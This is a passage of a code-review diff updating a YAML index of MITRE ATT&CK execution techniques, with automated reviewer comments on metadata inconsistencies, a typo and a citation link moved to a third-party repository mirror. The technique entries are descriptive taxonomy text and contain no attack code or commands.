- Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service C API
or the high level NSXPCConnection API
in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
-
- Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: XPC Services
- x_mitre_detection: ''
- kill_chain_phases:
- - phase_name: execution
- kill_chain_name: mitre-attack
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'Process: Process Access'
- x_mitre_remote_support: false
- x_mitre_attack_spec_version: 2.1.0
+ url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1204:
technique:
- modified: '2024-04-12T03:46:49.507Z'
+ modified: '2024-11-11T18:52:12.103Z'
name: User Execution
description: |-
An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).
While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).
- Adversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary; running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s; or downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204).(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+ Adversaries may also deceive users into performing actions such as:
+
+ * Enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary
+ * Running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+ * Downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204)
+ * Coerceing users to copy, paste, and execute malicious code manually(Citation: Reliaquest-execution)(Citation: proofpoint-selfpwn)
For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery)
kill_chain_phases:
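Review bot: typo in the new User Execution bullet, `* Coerceing users to copy, paste, and execute malicious code manually` should read `Coercing`; if the description is ingested verbatim from the upstream ATT&CK bundle, report it upstream rather than hand-editing generated YAML, otherwise fix it here. In the same hunk the XPC Services contributor line changes affiliation from `Csaba Fitzl @theevilbit of Offensive Security` to `Csaba Fitzl @theevilbit of Kandji` and `modified` jumps from 2022 to 2024 while `x_mitre_version` stays `'1.0'`; that is plausible for a metadata-only update but it is a content change, not a key reorder, and deserves a line in the commit message.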
@@ -26360,7 +26669,11 @@ execution:
phase_name: execution
x_mitre_contributors:
- Oleg Skulkin, Group-IB
- - Goldstein Menachem
+ - Menachem Goldstein
+ - Harikrishnan Muthu, Cyble
+ - ReliaQuest
+ - Ale Houspanossian
+ - Fernando Bacchin
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.
@@ -26375,7 +26688,7 @@ execution:
- macOS
- IaaS
- Containers
- x_mitre_version: '1.6'
+ x_mitre_version: '1.7'
x_mitre_data_sources:
- 'Instance: Instance Start'
- 'File: File Creation'
@@ -26402,6 +26715,10 @@ execution:
description: Brian Krebs. (2023, May 30). Discord Admins Hacked by Malicious
Bookmarks. Retrieved January 2, 2024.
url: https://krebsonsecurity.com/2023/05/discord-admins-hacked-by-malicious-bookmarks/
+ - source_name: Reliaquest-execution
+ description: Reliaquest. (2024, May 31). New Execution Technique in ClearFake
+ Campaign. Retrieved August 2, 2024.
+ url: https://www.reliaquest.com/blog/new-execution-technique-in-clearfake-campaign/
- source_name: Telephone Attack Delivery
description: 'Selena Larson, Sam Scholten, Timothy Kromphardt. (2021, November
4). Caught Beneath the Landline: A 411 on Telephone Oriented Attack Delivery.
@@ -26412,15 +26729,19 @@ execution:
API forms and more to scam users in popular online game “Roblox”. Retrieved
January 2, 2024.
url: https://blog.talosintelligence.com/roblox-scam-overview/
+ - source_name: proofpoint-selfpwn
+ description: 'Tommy Madjar, Dusty Miller, Selena Larson. (2024, June 17).
+ From Clipboard to Compromise: A PowerShell Self-Pwn. Retrieved August 2,
+ 2024.'
+ url: https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1072:
technique:
- modified: '2024-04-12T03:40:37.954Z'
+ modified: '2024-09-25T20:49:37.227Z'
name: Software Deployment Tools
description: "Adversaries may gain access to and use centralized software suites
installed within an enterprise to execute commands and move laterally through
@@ -26437,7 +26758,7 @@ execution:
on cloud-hosted instances, as well as the execution of arbitrary commands
on on-premises endpoints. For example, Microsoft Configuration Manager allows
Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
- joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+ joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -26485,7 +26806,7 @@ execution:
- Windows
- Network
- SaaS
- x_mitre_version: '3.0'
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Application Log: Application Log Content'
@@ -26518,12 +26839,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1072
atomic_tests: []
T1059.001:
technique:
- modified: '2024-03-01T18:01:37.575Z'
+ modified: '2024-10-15T16:39:13.228Z'
name: 'Command and Scripting Interpreter: PowerShell'
description: |-
Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process
cmdlet which can be used to run an executable and the Invoke-Command
cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
@@ -26584,8 +26904,9 @@ execution:
POWERSHELL LOGGING. Retrieved February 16, 2016.
url: https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
- source_name: Github PSAttack
- description: Haight, J. (2016, April 21). PS>Attack. Retrieved June 1, 2016.
- url: https://github.com/jaredhaight/PSAttack
+ description: Haight, J. (2016, April 21). PS>Attack. Retrieved September 27,
+ 2024.
+ url: https://github.com/Exploit-install/PSAttack-1
- source_name: inv_ps_attacks
description: Hastings, M. (2014, July 16). Investigating PowerShell Attacks.
Retrieved December 1, 2021.
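Review bot: the `Github PSAttack` reference URL changes from `https://github.com/jaredhaight/PSAttack` to `https://github.com/Exploit-install/PSAttack-1`, a different GitHub account from the cited author, while the description still attributes the work to `Haight, J.`. If the original repository is no longer reachable, an archived snapshot of the original URL keeps the citation tied to its author; pointing a reference at a third-party copy of a tool repository also means anyone following the link to fetch code is trusting an unverified mirror, which is worth avoiding in a security index.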
@@ -26607,12 +26928,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.001
atomic_tests: []
T1053.006:
technique:
- modified: '2023-09-08T11:56:26.862Z'
+ modified: '2024-10-15T16:42:51.536Z'
name: 'Scheduled Task/Job: Systemd Timers'
description: |-
Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer
that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl
command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -26690,14 +27010,13 @@ execution:
url: http://man7.org/linux/man-pages/man1/systemd.1.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.006
atomic_tests: []
T1059.004:
technique:
- modified: '2024-04-16T12:24:40.163Z'
+ modified: '2024-10-15T15:17:19.136Z'
name: 'Command and Scripting Interpreter: Bash'
description: |-
Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.
@@ -26755,36 +27074,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.004
atomic_tests: []
T1559:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
- type: attack-pattern
- created: '2020-02-12T14:08:48.689Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1559
- url: https://attack.mitre.org/techniques/T1559
- - source_name: Linux IPC
- url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
- description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
- March 11, 2022.
- - source_name: Fireeye Hunting COM June 2019
- url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
- description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
- 10, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-10T19:06:35.666Z'
name: Inter-Process Communication
description: "Adversaries may abuse inter-process communication (IPC) mechanisms
for local code or command execution. IPC is typically used by processes to
@@ -26805,25 +27099,110 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: Monitor for strings in files/commands, loaded DLLs/libraries,
or spawned processes that are associated with abuse of IPC mechanisms.
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Process: Process Creation'
- 'Script: Script Execution'
- 'Process: Process Access'
- x_mitre_permissions_required:
- - Administrator
- - User
- - SYSTEM
x_mitre_remote_support: true
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d
+ created: '2020-02-12T14:08:48.689Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1559
+ external_id: T1559
+ - source_name: Fireeye Hunting COM June 2019
+ description: Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June
+ 10, 2019.
+ url: https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
+ - source_name: Linux IPC
+ description: N/A. (2021, April 1). Inter Process Communication (IPC). Retrieved
+ March 11, 2022.
+ url: https://www.geeksforgeeks.org/inter-process-communication-ipc/#:~:text=Inter%2Dprocess%20communication%20(IPC),of%20co%2Doperation%20between%20them.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1559
atomic_tests: []
+ T1059.011:
+ technique:
+ modified: '2024-10-01T15:19:54.163Z'
+ name: Lua
+ description: |-
+ Adversaries may abuse Lua commands and scripts for execution. Lua is a cross-platform scripting and programming language primarily designed for embedded use in applications. Lua can be executed on the command-line (through the stand-alone lua interpreter), via scripts (.lua
), or from Lua-embedded programs (through the struct lua_State
).(Citation: Lua main page)(Citation: Lua state)
+
+ Lua scripts may be executed by adversaries for malicious purposes. Adversaries may incorporate, abuse, or replace existing Lua interpreters to allow for malicious Lua command execution at runtime.(Citation: PoetRat Lua)(Citation: Lua Proofpoint Sunseed)(Citation: Cyphort EvilBunny)(Citation: Kaspersky Lua)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'Script: Script Execution'
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--afddee82-3385-4682-ad90-eeced33f2d07
+ created: '2024-08-05T18:19:42.201Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1059/011
+ external_id: T1059.011
+ - source_name: Kaspersky Lua
+ description: Global Research and Analysis Team. (2016, August 9). The ProjectSauron
+ APT. Retrieved August 5, 2024.
+ url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07190154/The-ProjectSauron-APT_research_KL.pdf
+ - source_name: Lua main page
+ description: Lua. (2024, June 25). Getting started. Retrieved August 5, 2024.
+ url: https://www.lua.org/start.html
+ - source_name: Lua state
+ description: Lua. (n.d.). lua_State. Retrieved August 5, 2024.
+ url: https://pgl.yoyo.org/luai/i/lua_State
+ - source_name: Cyphort EvilBunny
+ description: 'Marschalek, Marion. (2014, December 16). EvilBunny: Malware
+ Instrumented By Lua. Retrieved August 5, 2024.'
+ url: https://web.archive.org/web/20150311013500/http:/www.cyphort.com/evilbunny-malware-instrumented-lua/
+ - source_name: PoetRat Lua
+ description: 'Mercer, Warren. (2020, October 6). PoetRAT: Malware targeting
+ public and private sector in Azerbaijan evolves. Retrieved August 5, 2024.'
+ url: https://blog.talosintelligence.com/poetrat-update/
+ - source_name: Lua Proofpoint Sunseed
+ description: 'Raggi, Michael. Cass, Zydeca. The Proofpoint Threat Research
+ Team.. (2022, March 1). Asylum Ambuscade: State Actor Uses Lua-based Sunseed
+ Malware to Target European Governments and Refugee Movement. Retrieved August
+ 5, 2024.'
+ url: https://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1204.003:
technique:
x_mitre_platforms:
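Review bot: the new T1059.011 (Lua) object ends with `atomic_tests: []` but has no `identifier:` key, whereas the T1559 object rebuilt just above it keeps `identifier: T1559`; T1559.003 and T1569 elsewhere in this diff also lack it, so the index is inconsistent on this point. If anything looks techniques up by `identifier` rather than by the mapping key, the new entry will be missed; either have the generator emit it for every technique or document that the key is optional. Note also that `x_mitre_detection: ''` is empty for Lua, so the only detection guidance the index carries for this technique is the two data sources (`Command: Command Execution`, `Script: Script Execution`).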
@@ -26852,7 +27231,7 @@ execution:
url: https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation
description: Team Nautilus. (2021, June). Attacks in the Wild on the Container
Supply Chain and Infrastructure. Retrieved August 26, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-26T16:42:35.318Z'
name: 'User Execution: Malicious Image'
description: |-
Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)
@@ -26879,30 +27258,12 @@ execution:
- 'Instance: Instance Creation'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1204.003
atomic_tests: []
T1203:
technique:
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
- created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '1.4'
- external_references:
- - source_name: mitre-attack
- external_id: T1203
- url: https://attack.mitre.org/techniques/T1203
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-15T16:34:23.908Z'
+ name: Exploitation for Client Execution
description: |-
Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
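Review bot: T1204.003 loses `x_mitre_attack_spec_version: 2.1.0` without gaining the `3.2.0` value every other regenerated object in this diff receives, and it keeps `x_mitre_permissions_required: - User`, a key the diff removes everywhere else. Together with the `modified` timestamp in the preceding hunk moving back from `'2022-04-25T14:00:00.188Z'` to `'2021-08-26T16:42:35.318Z'`, this suggests the object was sourced from a different (older) bundle than its neighbours. Check that the generator read a single bundle; otherwise consumers filtering on `x_mitre_attack_spec_version` will silently drop this entry.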
@@ -26919,9 +27280,10 @@ execution:
### Common Third-party Applications
Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Exploitation for Client Execution
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: Detecting software exploitation may be difficult depending
on the tools available. Also look for behavior on the endpoint system that
might indicate successful compromise, such as abnormal behavior of the browser
@@ -26929,21 +27291,37 @@ execution:
evidence of [Process Injection](https://attack.mitre.org/techniques/T1055)
for attempts to hide execution, evidence of Discovery, or other unusual network
traffic that may indicate additional tools transferred to the system.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: execution
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
+ - 'File: File Modification'
- 'Application Log: Application Log Content'
+ - 'Network Traffic: Network Traffic Flow'
+ x_mitre_remote_support: false
x_mitre_system_requirements:
- Remote exploitation for execution requires a remotely accessible service reachable
over the network or other vector of access such as spearphishing or drive-by
compromise.
- x_mitre_remote_support: false
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
+ created: '2018-04-18T17:59:24.739Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1203
+ external_id: T1203
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.006:
technique:
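Review bot: T1203 gains two data sources (`'File: File Modification'`, `'Network Traffic: Network Traffic Flow'`) and a 2024 `modified` timestamp, yet `x_mitre_version` is re-emitted as `'1.4'`, the same value removed earlier in the hunk. If upstream did not bump the version for this change that is fine, but since these two lines are the only content change in an otherwise key-reordering hunk, confirm they match the source bundle rather than a partially merged object.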
@@ -26993,28 +27371,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.006
atomic_tests: []
T1569:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
- type: attack-pattern
- created: '2020-03-10T18:23:06.482Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1569
- url: https://attack.mitre.org/techniques/T1569
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-20T19:55:40.527Z'
name: System Services
description: Adversaries may abuse system services or daemons to execute commands
or programs. Adversaries can execute malicious content by interacting with
@@ -27025,32 +27386,44 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: Monitor for command line invocations of tools capable of
modifying services that doesn’t correspond to normal usage patterns and known
software, patch cycles, etc. Also monitor for changes to executables and other
files associated with services. Changes to Windows services may also be reflected
in the Registry.
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'Process: Process Creation'
- 'Service: Service Creation'
- 'File: File Modification'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- - root
x_mitre_remote_support: true
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
+ created: '2020-03-10T18:23:06.482Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1569
+ external_id: T1569
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1059.003:
technique:
- modified: '2024-03-01T17:35:02.889Z'
+ modified: '2024-10-15T15:19:56.540Z'
name: 'Command and Scripting Interpreter: Windows Command Shell'
description: |-
Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)
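Review bot: `x_mitre_permissions_required` (User, Administrator, SYSTEM, root) and `spec_version: '2.1'` are dropped from T1569 with nothing replacing them; unlike the rest of this hunk these are genuine removals of data, not moves. If anything downstream filters techniques by required privilege or reads `spec_version`, it needs a follow-up, and if the upstream ATT&CK objects simply no longer carry these keys that should be stated in the PR description. Minor: `url:` now precedes `external_id:` inside external_references, the reverse of the old order, which is harmless churn.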
@@ -27093,12 +27466,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.003
atomic_tests: []
T1651:
technique:
- modified: '2024-04-12T03:27:48.171Z'
+ modified: '2024-10-15T13:42:42.543Z'
name: Cloud Administration Command
description: |-
Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. (Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command)
@@ -27155,11 +27527,10 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:43:27.104Z'
name: 'Command and Scripting Interpreter: Visual Basic'
description: |-
Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)
@@ -27224,14 +27595,13 @@ execution:
url: https://en.wikipedia.org/wiki/Visual_Basic_for_Applications
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.005
atomic_tests: []
T1648:
technique:
- modified: '2024-03-05T16:13:38.643Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Serverless Execution
description: "Adversaries may abuse serverless computing, integration, and automation
services to execute arbitrary code in cloud environments. Many cloud providers
@@ -27252,14 +27622,19 @@ execution:
an adversary may create a Lambda function that automatically adds [Additional
Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to a user
and a corresponding CloudWatch events rule that invokes that function whenever
- a new user is created.(Citation: Backdooring an AWS account) Similarly, an
- adversary may create a Power Automate workflow in Office 365 environments
- that forwards all emails a user receives or creates anonymous sharing links
- whenever a user is granted access to a document in SharePoint.(Citation: Varonis
- Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)"
+ a new user is created.(Citation: Backdooring an AWS account) This is also
